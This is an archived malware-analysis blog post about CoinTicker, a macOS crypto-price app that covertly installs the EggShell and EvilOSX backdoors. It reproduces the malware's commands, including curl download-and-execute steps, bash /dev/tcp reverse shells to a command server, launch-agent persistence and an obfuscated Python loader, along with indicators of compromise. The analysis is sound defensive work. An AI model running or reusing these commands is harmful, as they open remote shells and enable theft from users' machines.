{
	"id": "55da818d-4652-44a6-8999-7d70b27b99ff",
	"created_at": "2026-04-06T02:12:31.165499Z",
	"updated_at": "2026-04-10T13:12:39.569586Z",
	"deleted_at": null,
	"sha1_hash": "09086979ab9afe18fbaa069672416afcaf3705ef",
	"title": "Mac cryptocurrency ticker app installs backdoors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 193716,
	"plain_text": "Mac cryptocurrency ticker app installs backdoors\r\nBy Thomas Reed\r\nPublished: 2018-10-28 · Archived: 2026-04-06 02:02:43 UTC\r\nAn astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was\r\nexhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two\r\ndifferent backdoors.\r\nBehaviors\r\nThe CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to\r\nsomeone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that\r\ngives information about the current price of Bitcoin.\r\nThe app’s preferences allow the user to customize the display, showing information about a wide variety of\r\ncryptocurrencies, including Bitcoin, Ethereum, and Monero.\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 1 of 5\n\nAlthough this functionality seems to be legitimate, the app is actually up to no good in the background,\r\nunbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there’s nothing\r\nto suggest to the user that anything is wrong.\r\nWhen launched, however, the app downloads and installs components of two different open-source backdoors:\r\nEvilOSX and EggShell.\r\nThe app executes the following shell command to download a custom-compiled version of the EggShell server for\r\nmacOS:\r\nnohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; open\r\nThe first part of the command downloads an encoded file from a GitHub page belonging to a user named\r\n“youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode\r\nthat file into a hidden Python file named .info.py. 
Finally, it executes the resulting Python script.\r\nThe .info.py script performs multiple tasks. First, it opens a reverse shell connection to a command \u0026 control\r\nserver, using the following command:\r\nnohup bash \u0026\u003e /dev/tcp/94.156.189.77/2280 0\u003e\u00261\r\n(The domain seednode3.parsicoin.net resolves to this IP address.)\r\nNext, it downloads the EggShell Mach-O binary, saving it to /tmp/espl:\r\ncurl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/mac\r\nFinally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell.\r\n#! /bin/bash\r\nnohup bash \u0026\u003e /dev/tcp/94.156.189.77/2280 0\u003e\u00261\r\nThe CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically:\r\n AbandonProcessGroup Label com.apple.espl ProgramArguments sh -c nohup c\r\nIf it seems like this results in the espl binary being launched multiple times, that is indeed the case.\r\nThe software also creates a folder within the user’s Containers folder named .UpQZdhkKfCdSYxg, which is home\r\nto a Python script named plQqVfeJvGo. (We believe these names are randomized, but unfortunately the\r\nCoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the\r\ncontent:\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport getpass\r\nimport uuid\r\ndef get_uid(): return \"\".join(x.encode(\"hex\") for x in (getpass.getuser() + \"-\" + str(uuid.getnode()\r\nexec(\"\".join(os.popen(\"echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 ... 
TjO1GlH1+7cP7pDYa8ykBquk4WhU0\r\nExtracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by GitHub user\r\nMarten4n6.\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Minimal bot which loads modules as they are needed f\r\nThis script has been customized to cause the backdoor to communicate with a server at 185.206.144.226 on port\r\n1339. The malware also creates a user launch agent named com.apple.EOFHXpQvqhr.plist designed to keep this\r\nscript running.\r\nImplications\r\nAlthough it’s unknown exactly what goal the hacker behind this malware had in mind, both EggShell and\r\nEvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is\r\ndistributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to\r\nusers’ cryptocurrency wallets for the purpose of stealing coins.\r\nAt first, this looked like it could have been a supply chain attack, in which a legitimate app’s website is hacked to\r\ndistribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the\r\nTransmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a HandBrake mirror server\r\nwas hacked to distribute Proton.\r\nHowever, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is\r\ndistributed via a domain named coin-sticker.com. This is close to, but not quite the same as, the name of the app.\r\nGetting the domain name wrong seems awfully sloppy if this were a legitimate app. 
Adding further suspicion, it\r\nseems that this domain was just registered a few months ago on July 13.\r\nFor this reason, Malwarebytes for Mac detects the CoinTicker application in addition to the other components of\r\nthis malware, as OSX.EvilEgg.\r\nOne interesting note about this malware is that none of it requires anything other than normal user permissions.\r\nRoot permissions are not needed. There is often an erroneous over-emphasis on malware’s need for root\r\nprivileges, but this malware is a perfect demonstration that malware does not need such privileges to have high\r\npotential for danger.\r\nIndicators of Compromise\r\nFiles created:\r\n/private/tmp/.info.enc /private/tmp/.info.py /private/tmp/.server.sh /private/tmp/espl ~/Library/Laun\r\nNetwork connections:\r\n94.156.189.77:2280 185.206.144.226:1339\r\nSHA-256:\r\nCoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd608\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/"
	],
	"report_names": [
		"mac-cryptocurrency-ticker-app-installs-backdoors"
	],
	"threat_actors": [],
	"ts_created_at": 1775441551,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.pdf",
		"text": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.txt",
		"img": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.jpg"
	}
}